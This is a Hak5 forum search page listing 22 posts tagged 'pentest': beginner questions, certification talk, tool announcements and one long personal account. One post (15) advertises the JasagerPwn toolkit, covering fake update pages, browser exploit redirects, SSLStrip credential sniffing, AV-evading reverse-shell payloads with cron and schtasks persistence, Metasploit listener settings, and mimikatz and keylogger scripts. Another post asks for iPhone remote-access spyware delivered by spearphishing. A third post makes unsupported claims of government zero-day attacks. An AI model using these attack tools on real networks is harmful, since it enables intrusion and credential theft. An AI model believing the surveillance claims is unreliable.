Jump to content

Search the Community

Showing results for tags 'pentest'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • WiFi Pineapple Mark VII
    • USB Rubber Ducky
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • WiFi Pineapple (previous generations)
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...

Date Created

  • Start


Last Updated

  • Start


Filter by number of...


  • Start





Website URL







Enter a five letter word.

Found 22 results

  1. I have set up my pentest lab with 2 stand alone systems and another system running a vm of many os versions. I am new to Metasploit. I have a system set up with a couple of exploitable programs and using nmap I can scan them and they show up as exploitable. Problem is how do I reconcile those exploits from nmap to Metasploit. Nothing in nmap shows up within Metasploit nor can I search and make a connection to tell me how to bring up anything in Metaspoit that is relatable to the languish I see in nmap. Lets use this as an example so I can try to be more clear. Say my test machine has "exploit_123" on it according to my nmap scans. So I go to my Kali machine to bring up Metasploit and I look through for "exploit_123" and nothing matches. I go to the link in my nmap scan nest to "exploit_123" and at the site it lists a lot of exploits but nothing matches the name of the "exploit_123" in my nmap scan. So how do I locate "exploit_123" so I can get started with Metasploit? Thanks for your time!
  2. hello everybady,i am new in this forum.right now i work as penetration tester for a little compay who protects from mobile hacking.In this project I am searching for an opensource app or a leaked app that has the ability to do full jailbreak to an iPhone and get full Remote access like: uploads and downloads data from the phone,use the camera and video, record voice,gets user location,web history,list of contacts and so on.i also tried many commrical apps like:mSpy,MobileStealth and so on but they were useless.i thoungt to myself that for the start i can lure the user using spearphising or wififisher.do you have any good,working ideas for the app?
  3. I am looking to do some pen testing qualifications in the near future. I am really interested in buying some of the tool kits offered on the HAK5 Shop but just wanted to know if there are any laws for Japan that would not allow tools like this?
  4. I have JWT token and I want to modify the key id field. Kid field can be used for local files. I had verfied that /etc/passwd can be used but I don't know the content. So I want to know some files that I can predict the content. The target website have which I can download that png file. But I don't know the absolute path for that file. Does anyone know the solution of my problem.? Please help me.
  5. Im looking for some ideas on how to work on and practice using kali linux for the purpose of pen-testing and using all the various functions kali comes with. Things to bare in mind: I am fairly new to this, I have more then one computer, Im looking to aggressively expand my knowledge in this area, and of course i wanna be able to do this w/o breaking or damaging anything. Thoughts and suggestions, please and thank you!
  6. Hey everyone, just wanted to show you a recently created service for automated web application and network security scan. If some of you are hosting you'r own web applications perhaps you could test it. If you actually do, please check if there is some vulnerability Metascan could not find. Features: 1. Scans all 65535 ports on target hosts. The scan might take a while but it makes sure that all running services are found. 2. All the services running on host are checked for available vulnerabilities using CVEdetails DB. 3. All input forms and HTTP parameters are tested for most common web application vulnerabilities (XSS, SQLi, XXE and other OWASP TOP 10 attacks). 4. 40 protocols can be brute forced with Metascan's unique password dictionary. The dictionary has quite a long history as it was made up of real user passwords from recent data leaks. Most pentesters i know are building their own dictionaries, the METASCAN's one is huge. 5. Wordpress is tested separately with multiple tools and dir listing dictionaries for Wordpress version,plugins, themes enumeration. After the versions of plugins and CMS itself are revealed, METASCAN automatically searches for public exploits. The key word in METASCAN is "automatically", id say it's like an automatic pentester. 6.METASCAN is capable of subdomains enumeration too, so in case you have left some subdomains/testing servers and beta version servers on public, there will be info about them in the end report too. In my experience it is a common problem, especially for ICO. The reason i created this post is to provide website administrators who are most likely to be hanging out here with a useful service for automated web application security assessment. The solution could be useful in case you are not a pentester/whitehat yourself, but need to get some sense of how secure you'r website is without paying for human work, which is much more expensive. Also the scan is performed with usage of all the tools attacker could use to attack you'r web application. Also METASCAN is probably the best solution in case you need to scan multiple hosts or huge network. The network scanner is capable of scanning huge subnets, like /80. Hope you like it, and any feedback is always appreciated. It took a lot of coding and time to roll out this project. English version for a scan submit: https://metascan.ru/en.html
  7. Original link is here (with more pertinent details that I won't post in this thread): https://github.com/corna/me_cleaner/issues/51 My name is Carlos Royal and I've witnessed several zero day exploits used against my computer. As a result of this, I've been the target of government corruption AND an extended gaslighting campaign that's designed to undermine the fact that the government got caught red handed breaking into my pc (when I was using an end-of-life system that had no management engine) by means of both attempting to erode my sanity/make me question my memory and attempting to pull me out of integrity (so I hand my power away/do something criminal-esque due to provocation and end up in prison/lose liberties or rights... to undermine the fact that the NSA got caught red handed). This post, which spans an experience of at least three years, is meant to combat the governments method/tactic of gaslighting (to escape accountability/acknowledgement of misusing government capabilities), by means of making my experience a public record (since the techniques/tactics employed rely on me staying silent due to doubt, fear, and "what if's"), and is highly beneficial to any security professional that reads it. (to the organization that targeted me: Consider the above paragraph "Game Over.") Mandatory backstory: A while ago, I decided to challenge myself by attempting to obtain the Offensive Security Certified Professional certification in an effort to break into the penetration testing field. Over the course of 120 days, I managed to successfully breach and escalate on 16 systems within the OSCP lab. Firefox Zero Day: During my progress, I noticed unusual activity on my computer. I make heavy use of the Linux terminal on an everyday basis and I noticed that the shell that I was using wasn’t the first shell that was open. Upon further investigation, I noticed two bash processes running on my PC. Upon closing the one that I wasn’t using, my Firefox browser closed at the exact same instant. This leads me to believe that I was targeted by the FoxAcid system due to my activity from the OSCP labs and that the zero day exploit didn't use the proper escape sequence. Tor Malicious Node Zero Day: I utilized an Open-WRT router as the base of my build. From behind it, I built an Arch Linux “transparent TOR router” that was designed to fail-close (where if my PC could not connect to the internet through TOR, it wouldn’t be able to connect to the internet whatsoever). From behind this router, I rebuilt my new PC using the Arch Linux distro. A few weeks later, after my build was complete, in use, and thoroughly tested, I observed on the “check.torproject.org” page (which was a page that I would check compulsively) that I “wasn’t using TOR.” (THE MANAGEMENT ENGINE EXISTED WITHIN THE PC BUILD THAT I USED WHEN THIS EXPLOIT WAS USED AGAINST ME. THE GOVERNMENT UNMASKED ME OVER TOR SO I WOULD CATCH THE IP ADDRESS OF THE TOR NODE ON PURPOSE.) This would lead me to believe that the government is in possession of a risky zero day exploit that exists to target TOR only users. Instead of targeting the TOR network directly, it would seem that this exploit works at the modem level and intercepts and possibly redirects the user to a malicious TOR node that’s not on the TOR network. NOTE: If you "attempt to browse" the check.torproject.org page and it attempts to resolve for an extended period of time when using TOR, you should probably reset your circuit. You're probably being unmasked and your connection to the check.torproject.org page is most likely being dropped. DBUS Daemon Socket Exploit/X11 Socket Exploit: The "bash" and "sh" Linux binaries aren't the only things that the government can target. They are also capable of targeting other things, such as the DBUS-DAEMON socket or the X11 socket on a Linux PC, to create a secondary session for the purpose of viewing, and perhaps interacting, with the target's PC. Things that can be done include, but are not limited to: spawning extra lock screens, crashing GUI tied processes (such as security scripts running in konsole), crashing the GUI in general, viewing your keystrokes and monitors, etc. A home user's browser is one of the primary avenues of attack and can be targeted by state actors to spawn shell binaries (or any binary) or use exploits against the DBUS-DAEMON socket or X11 socket. NOTE: This can be rectified with pre-existing open source software, such as firejail (read the man page, USE THE AUDIT FEATURE. It will TELL YOU WHAT TO FIX.): firejail --rmenv=DBUS_SESSION_BUS_ADDRESS --private=/root/a/fake/home/directory/ --x11=xephyr --quiet --net=ethernet1 openbox Alternative to openbox, adding "nolisten local" to the X11 options of the X server running on a users system will disable abstract sockets (which should be sufficient in combination with a private tmp directory and private network spaces to use the PC's gui instead of nesting it). If you're cosmologically "lucky," you may be able to see firejail kick back an error when the "sandboxed application" attempts to access a blacklisted file/folder that it's not supposed to. If you're concerned about sandbox escapes (which do exist), this can be combated with the "kill" command listed below, as well as with good old fashioned socket monitoring (such as running "ss," with extra parameters, in a loop to tie processes to IP addresses). I've also found that renaming "dbus-launch" and "dbus-send" to "dbus-launch.old" and "dbus-send.old" as well as qdbus to qdbus.old serves to stifle the sandbox escapes that aren't covered by the shell kill script. These sandbox escapes aren't AS DETRIMENTAL as having shell access/control over the users PC, but can still be used for seriously nefarious purposes. Theory: The 3 letter agencies connect to a users pc through google IP addresses. Zombie Tracking Cookies: Firefox connects to the internet when opened, regardless of whether or not the user chooses to browse. Upon attempting to disable third party cookies, I noticed that there was a tracking cookie that was implanted in my browser despite the fact that I did no browsing. Previously, the only third party tracking cookie that I've witnessed was one belonging to "google." I theorize that the NSA's zombie cookies implant themselves when the user opens up their browser (which connects to the internet) and disguises itself as the site that the user visits first. Because I did no surfing whatsoever, the tracking cookie was disguised as a Mozilla tracking cookie. The Mozilla home page does not require third party tracking cookies. This exploit was spotted originally due to my use of an addon that self-destructs unused cookies after 1 minute. Before I found this cookie undisguised, I noticed that a "google" tracking cookie would continue to self-destruct every minute, despite me closing and re-opening the browser and not navigating to google. Catching it in it undisguised state some time later confirmed my suspicions that this was a zombie tracking cookie (which was most likely set to attempt to re-implant itself automatically whenever I opened my browser). How Corna's Intel ME removal script no shit saved my skin: Because of the nature of the incidents that I've witnessed, I've designed a script that utilizes the killall command that will kill all processes specified that are older than 5 seconds. killall "sh" -q -v -y 5s This command, when run in a loop every two seconds, kills all shells ("bash" and "sh" specifically) that are younger than 5 seconds. So long as a terminal process that THE USER CONTROLS is already running, the user gains the ability to use their own terminals while denying access to terminals that are opened as a result of any exploits that are used against their computer. The terminal is THE HEART of pentesting, and in denying this resource to an attacker, it denies an attacker the ability to gain control over a users PC. The idea is to open a few terminal processes before running this command in a loop in a script (AS ROOT AND AS A BACKGROUND PROCESS, since a terminal manager's process can be "crashed"), and then connecting to the internet as normal. Your operating system is capable of defending itself (for free) with native tools. This technique can be used for more than just stopping shells. It can also be used for sandbox escapes that occur through firejail. Common binaries that the 3 letters can target are "bash," "sh," "dbus-daemon," and "qdbus (kde)." The last two can be spawned as processes and attached to firefox, similar to escaped shells. The kill command will work to stop the end result of Firefox forking to binaries on your system that it shouldn't fork to. This can be tested ON YOUR OWN WITH A KNOWN VULNERABLE VM. I actually ENCOURAGE anyone and EVERYONE to try this for themselves (I want to be proven wrong). What's important to note here is that THIS IS USELESS WITHOUT THE INTEL MANAGEMENT ENGINE REMOVED FROM YOUR COMPUTER. No software solution will ever be a good enough solution so long as hardware backdoors/secondary operating systems exist within a users system. The Intel management engine contains an Operating system that shares physical resources with the target machine. Without Corna's removal efforts, I would be up the creek with no paddle. To obtain a better stance on PC security, open source security solutions must be used IN COMBINATION WITH CORNA'S REMOVAL SCRIPT/the removal of the Intel Management Engine. Both hardware and software security solutions must be used together. I leave my post here for the security experts to judge for themselves (all attempts to take the appropriate channels to close the leaks, have failed spectacularly). Critique this logic, spin up a vulnerable VM, and TEST IT FOR YOURSELF. I'd love for someone to prove me wrong.
  8. The Pineapple has many features that make it a multi-layer tool in the steps of pentesting. It can do everything from passive sniffing to dns spoofing. Where should this fit into my workflow? And where has it fit into yours? Thank You! -Michael
  9. Hi, im new to this forum and i have a question related to wireless penetration testing. I have a Alfa AWUS036NH Card and amped it to 33dBm and a Yagi-uno antenna with 25dBi of gain.. If i'm correct the EIRP calculation should result in 58 Watts / EIRP. So my question is how far would i get with this setup and another thing i live in a place where surrounded with a lot of houses does that mean that the walls, roofs etc block the signal and decrease the signal so i get less further than when (i.e on top of a building.)
  10. Hello guys, I have been working on VulnHub/Root-me.org/Hackthebox.eu watching the hak5 show a lot on youtube lately one of the common things i have noticed on all the platforms is that people looking for a starting point to get into the security field to help everyone whose new to this field, you need a strong will a lot of persistence and above all "Try Harder" attitude to help the community further I made a blog where I will be posting CTF guides/Attack Methodology from metasploit to reverse engineering everything so please check out this blog and please tell me about your views! http://openexploit.blogspot.in/2017/10/ "Security is hard, Just dive in" - Jared Demott
  11. Hello guys, I have been working on VulnHub/Root-me.org/Hackthebox.eu watching the hak5 show a lot on youtube lately one of the common things i have noticed on all the platforms is that people looking for a starting point to get into the security field to help everyone whose new to this field, you need a strong will a lot of persistence and above all "Try Harder" attitude to help the community further I made a blog where I will be posting CTF guides/Attack Methodology from metasploit to reverse engineering everything so please check out this blog and please tell me about your views! http://openexploit.blogspot.in/2017/10/ "Security is hard, Just dive in" - Jared Demott
  12. Hello, I'm working as pentester freelancer. The company that hired me has to perform annually at least one external and one internal pentest of its web application (they have an e-commerce service). They have to obey a set of compliance rules to ensure that they will keep a maturity security level. To keep this level of maturity security, an external audit company has to identify and verify if these pentests were executed. Note that this means that the external audit company does not have to know which vulnerabilities were found, but they have to be sure that tests were made. Pentests's reports that I found on the internet (from SANS, offensive security, PCI) and that I used on my previous works do not serve for this purpose. I say this because they have descriptions about vulnerabilidades, detailed evidences from their existence (with screenshots, network's captures) to prove their existence. Note that these types of reports are not what I need to generate, since I just need to generate a document proving that I executed the pentest. Would you have any suggestions for me to generate this new kind of document? Is there any auditing tool that could be used for this end? Would you suggests another approach?
  13. How can someone use Powershell Empire for attacks over the internet? Do you need a server? Also can someone create a Veil-Evasion payload and then get a connection in Empire? It would be great if someone could use it outside of the network because Privilege Escalation is way easier than it is with Metasploit! Furthermore are there any tools for Post-Exploitation other than Metasploit , Powersploit? Any suggestions would be appreciated!
  14. Faraday is the Integrated Multiuser Risk Environment you were looking for! It maps and leverages all the knowledge you generate in real time, letting you track and understand your audits. Our dashboard for CISOs and managers uncovers the impact and risk being assessed by the audit in real-time without the need for a single email. Developed with a specialized set of functionalities that help users improve their own work, the main purpose is to re-use the available tools in the community taking advantage of them in a collaborative way! Check out the Faraday project in Github. Two years ago we published our first community version consisting mainly of what we now know as the Faraday Client and a very basic Web UI. Over the years we introduced some pretty radical changes, but nothing like what you are about to see - we believe this is a turning point for the platform, and we are more than happy to share it with all of you. Without further ado we would like to introduce you to Faraday 2.0! https://github.com/infobyte/faraday/releases/tag/v2.0 This release, presented at Black Hat Arsenal 2016, spins around our four main goals for this year: * Faraday Server - a fundamental pillar for Faraday's future. Some of the latest features in Faraday required a server that could step between the client and CouchDB, so we implemented one! It still supports a small amount of operations but it was built thinking about performance. Which brings us to objective #2... * Better performance - Faraday will now scale as you see fit. The new server allows to have huge workspaces without a performance slowdown. 200k hosts? No problem! * Deprecate QT3 - the QT3 interface has been completely erased, while the GTK one presented some versions ago will be the default interface from now on. This means no more problems with QT3 non-standard packages, smooth OSX support and a lighter Faraday Client for everyone. * Licenses - managing a lot of products is time consuming. As you may already know we've launched Faraday's own App Store https://appstore.faradaysec.com/ where you can get all of your favourite tools (Burp suite, IDA Debugger, etc) whether they're open source or commercial ones. But also, in order to keep your licenses up to date and never miss an expiry date we've built a Licenses Manager inside Faraday. Our platform now stores the licenses of third party products so you can easily keep track of your licenses while monitoring your pentest. With this new release we can proudly say we already met all of this year's objectives, so now we have more than four months to polish the details. Some of the features released in this version are quite basic, and we plan to extend them in the next few iterations. Changes: * Improved executive report generation performance. * Totally removed QT3, GTK is now the only GUI. * Added Faraday Server. * Added some basic APIs to Faraday Server. * Deprecated FileSystem databases: now Faraday works exclusively with Faraday Server and CouchDB. * Improved performance in web UI. * Added licenses management section in web UI. * Fixed bug when deleting objects from Faraday Web. * Fixed bug when editing services in the web UI. * Fixed bug where icons were not copied to the correct directory on initialization. * Added a button to go to the Faraday Web directly from GTK. * Fixed bug where current workspace wouldn't correspond to selected workspace on the sidebar on GTK. * Fixed bug in 'Refresh Workspace' button on GTK. * Fixed bug when searching for a non-existent workspace in GTK. * Fixed bug where Host Sidebar and Status Bar information wasn't correctly updated on GTK. * Fixed sqlmap plugin. * Fixed metasploit plugin. We hope you enjoy it, and let us know if you have any questions or comments. https://www.faradaysec.com https://github.com/infobyte/faraday https://twitter.com/faradaysec
  15. Disclaimer: This script is intended for LEGAL purposes ONLY. By downloading the following material you agree that the intended use of the previously mentioned is for LEGAL and NON-MALICIOUS purposes ONLY. This means while gaining client side exploits, you have the correct documentation and permissions to do so in accordance with all US and International laws and regulations. Nor I nor any associates at Hak5 condone misuse of this code or its features. Responsibility Disclosure: Hak5 has no affiliation with this code base. This code is not reviewed or verified by Hak5; therefore they do not take any responsibility for any of this code and its functionality. If you are paranoid (good!) - then look over the code yourself to be safe. Description This script is intended to increase attack vector consistency and stability by automating the process. For penetration testers, the most important thing is having a stable and well prepared attack vector - because you only get one chance. This script provides exactly that, a way to prepare and automate advanced and complex attack vectors in the lab, and then use them in the field. Compatibility / Troubleshooting Script Requirements: Pineapple [MK4 3.0.0] [MK5 1.0.0] - Debian based Linux. Tested Configuration: Pineapple MK5 1.0.0, Crunchbang Linux | Kali Linux Battery - Pineapple (Router: wlan0 | ICS: wlan1) -> Alfa (DeAuth) Attacker IPs: (2 man red-team) - Configuration Picture: Setting up the Script: Open up jasagerPwn in your favorite text editor. Look over all the variables in this file and read my comments; they should clearly explain what is what.Adjust the variables based on your pineapple setup. If anything is unclear, feel free to ask me and I can clarify. After you setup the script, connect to a stable internet connection and run the script - this will prompt you to install dependencies. This will take a few minutes, after that is completed you can connect to the pineapples network (either via wireless or ethernet) and relaunch the script. Thats it. You should be able to use the attack modules. Dependencies Installation: Dependencies will attempt to install automatically if they are not detected on your system, f this fails for you - please look at the src/system_modules/dependencies.sh and just install it yourself. I've tested installation processes on Debian, Crunchbang, and Kali Linux. Infusion dependencies are also required for attack modules. Please refer to the list of attack modules below and their corresponding "Requirements". Included Attack Vector Modules browserPwn - Redirect LAN to Metasloits auxiliary module browser_autopwn. This will be detected by AV. Victim Support: Mac OSX, Windows, Linux. Requirements: Metasploit, DNSSpoof Infusion browserPwn iFrame - Inject an invisible iFrame into the victims browsing session that points to metasploit browser_autopwn. Victim Support: Mac OSX, Windows, Linux. Requirements: Metasploit, Strip-N-Inject Infusion ​BeEf - Inject a BeEf JavaScript hook transparently into victims browsing sessions. This is a form of Man-in-the-browser and will not be detected by AV.​Victim Support: Mac OSX, Windows, Linux Requirements: Strip-N-Inject Infusion Fake Update - Redirect LAN to a realistic fake update page with a [custom] payload download. Victim Support: Mac OSX, Windows. Requirements: Metasploit, DNSSpoof Infusion Click Jacking - Hijack the entire DOM with an injected <div>. No matter where you click, it downloads a payload. Victim Support: Mac OSX, Windows. Requirements: Metasploit, Strip-N-Inject Infusion Java Applet Injection - Transparently injects an OS agnostic java applet into the victims browsing session. Victim Support: Mac OSX, Windows, Linux. Requirements: Metasploit, Strip-N-Inject Infusion Java Applet Redirect - Redirects users to a Java page with an OS agnostic java applet payload. Victim Support: Mac OSX, Windows, Linux. Requirements: Metasploit, DNSSpoof Infusion SSLStrip - Remove SSL from the victims connections and sniff credentials. Victim Support: Mac OSX, Windows, Linux. Requirements: SSLStrip Infusion Aireplay-ng [local] - DoS APs and try to make them join yours via custom aireplay-ng script on the attacker machine. This script will run aireplay-ng against the AP broadcast, note that this works best if you are closer to the AP than the client MDK3 [local] - Deauths nearby clients from their APs and try to make them join yours via MDK3 from the attacker machine. This script will run MDK3 to deauthenticate clients from an AP directly note that this works best if you are close to the clients. As a result, this will have slightly better average range effectiveness. Included Payloads (w/ Source & Documentation) I have included some of my most successful and efficient payloads for your use. One for Mac OSX, and one for Windows - both will completely bypass signature based anti-virus and most behavioral HIPS as well. Apple_MacOSX_Update.pkg Description: This is 4 lines of BASH stuck in an apple postinstall script. No signature AV can ever detect this because it uses system commands and contains no binaries in the package. This will spawn 2 root shells to the following addresses: 6446 6446 Persistence: It will also add a persistent backdoor that will spawn these 2 every 3 minutes (sudo crontab -l) Metasploit Listener: use exploit/multi/handler set PAYLOAD generic/shell_reverse_tcp set LHOST set LPORT 6446 set ExitOnSession false set AutoRunScript "" exploit -j powershell-https.exe Description: This is an implementation of "Invoke-Shellcode" from Matthew Graeber's PowerSploit modules. It was stripped down then minified and implemented into a standalone python script then compiled into an executable. It is not detect at the time of this writing. If the signature becomes detected, just make a new one. This will spawn 2 meterpreter shells to the following addresses: 587 587 Persistence: It will also add a persistent backdoor to Windows that will these 2 shells every 3 minutes (schtasks /query /tn winupdate) Metasploit Listener: use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_https set LHOST set LPORT 587 set SessionCommunicationTimeout 0 set ExitOnSession false set EXITFUNC process set AutoRunScript "" exploit -j shellcode-tcp.exe Description: This is a windows meterpreter shell that was encoded into base 64, embedded into a python script that preforms basic shellcode execution, and then compiled into an executable. It is not detect at the time of this writing. If the signature becomes detected, just make a new one with some random data in it. This will spawn 2 meterpreter shells to the following addresses: 587 587 Persistence: It will also add a persistent backdoor to Windows that will these 2 shells every 3 minutes (schtasks /query /tn winupdate) Metasploit Listener: use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST set LPORT 587 set ExitOnSession false set EXITFUNC thread set AutoRunScript "migrate -f -k" exploit -j Included Resources I have included a few resources that I find useful on pentests with the pineapple. Metasploit Scripts: These are resource scripts that can be executed from msfconsole or in meterpreter. Creates a nice way to automate post-exploitation at your fingertips. In order to run them use "resource resources/metaspoit_scripts/file_collector.rc". file_collector.rc: Automatically search for documents on the system and download them. enum_app_data.rc: Enumerate passwords and other data from browsers, putty, etc. keylog_recorder.rc: Start a keylogger that will poll and automatically collect keystokes. You can use this then CTRL+Z to background the session. mimikatz.rc: Dump cleartext passwords from memory. Hashses are great, but why deal with cracking when they are sitting in memory in clear text? payload_inject.rc: Inject a meterpreter session into explorer.exe. This is like "duplicate" but you can send it to your red-team and not ever drop a binary on the system. listeners.rc: This is useful for the other members of the red-team not running JasagerPwn. They can just "msfconsole -r listeners.rc" and be ready to receive shells web_clone.sh: This is a simple wget command that I love to use to clone websites for phishing. It will put everything into a single index.html file.Note: If you're preforming a MITM attack then you need to download all the resources that are hot-linked in index.html and then modify them to local, relative paths. This can be tedious but is what I have used to do every template in JasagerPwn airdrop-ng: This was an airdrop-ng attack module that I made before MDK3. I think MDK3 works better so I took it out and plopped it here. Developing Attack Modules This script was created in a modular architecture, allowing for relatively simple expansion of attack vectors. Use the "attack_module_example.sh" located in the resources directory for an example reference. There are just a few requirements when developing the modules: If you're making a local de-authentication module - use "deauth" or "dos" in the description string. You must have a "start_myname" and "stop_myname" function in that format (myname is arbitrary). You must have a unique "title", "description", and "bindings" variables. I recommend editing the src/system_modules/utility.sh - cleanup() function to cleanup after your module. Module Submission: If you develop an attack module that you would like to have added into JasagerPwn, that is great! Just let me know and send me the code. If its a good idea; I'll code review it and add it into the script. Questions / Problems Google Code: https://code.google.com/p/jasagerpwn-reborn/ Bug Submission: https://code.google.com/p/jasagerpwn-reborn/issues/entry Changelog: https://code.google.com/p/jasagerpwn-reborn/source/list Questions: Feel free to ask here or in IRC (irc.hak5.org #pineapple). Download / Update Download via Subversion (sudo apt-get install subversion): svn checkout http://jasagerpwn-reborn.googlecode.com/svn/trunk/ jasagerPwn-Reborn Update Script to Latest Revision: ./jasagerPwn -u Enjoy!
  16. Hi all, Just a quick post about certs. Im new to Security so thinking about doing Offensive Security course but need to save up ha ha. I am currently a sys admin/devops and want to move into pen testing as thats where I have wanted to be for a long time. Anyone else here done any similar certs? if so what was your experience, was it useful to do etc?
  17. Work has been a little slow and I have some time on my hands. I've been considering publishing a website with a lot of hacking related content. Mostly links to tutorials, software, videos, and things like that. Basically a web directory specifically geared toward cybersecurity. I've been looking through some affiliate program and ad networks and most of them don't want to advertise on hacking related sites, even if the site is purely informational. Looking for some kind of company that serves interstitionals, banners, or something like that. I'm not really pick but I need it to meet these three conditions. ad network doesn't hack my visitors ad network accepts hacking related sites ad network actually pays reliably Anybody know where I should look for something like this?
  18. Hey everybody. I am new to this forum but not new to Hak5 (love the show). It has been some time since I played with Backtrack (now Kali Linux -- has it been that long for me? hah) and toyed with the basics using my home network as a guinea pig :-D I live in an apartment complex and am starting to wonder if my home network might be the target of some tomfoolery... Trying not to sound too paranoid here but I've been noticing more red flags lately.... it is probably nothing... but it is probably time for me to give the home network a health checkup :-) I was just wondering if someone could point me in the right direction of which tools to use, where to start, etc. using the latest version of Kali I know a good place to start is testing the security of my wifi encryption (TKIP & AES) and passphrase... but after this I am kind of stumped as to what else I should check for. Thanks guys! Happy to be here. Hope to get to know some of you! Cheers.
  19. Hi, I want to use my 8GB USB stick as a multiboot USB which can boot into useful tools like ophcrack and kali. I have seen that Hak5 have many videos on this topic including Multipassing usb's, Katana and such. Some of these are as old as 2006. I am interested in using Katana, but I would like the most up to date USB toolkit, from 2014/15. If you need any more info, ask. Thanks!
  20. Hi I have an Office automation can Pentest. And I Session that is sent from the client to the server-side Office automation to test. What can I bring this Session outgoing and incoming. I'm a DLL in the client-side Office automation. Searching for what I should look for? tank you .
  21. I want to learn more about hacking. I have heard about free hacker spaces. But whenever I look those up on Google I find a nice long list of broken links. Are there still any legal hacker spaces open?
  22. hi! i read an article about whatsapp. they say whatsapp is still hackable. i tryed to log in to my account with a xmpp-client on windows. i used countrycode+phonenumber as username and md5hash of reversed udid of my phone. server was s.whatsapp.com. but i cant connect. does anyoneknow what i did wrong? (i know, my english is unique :) )
  • Create New...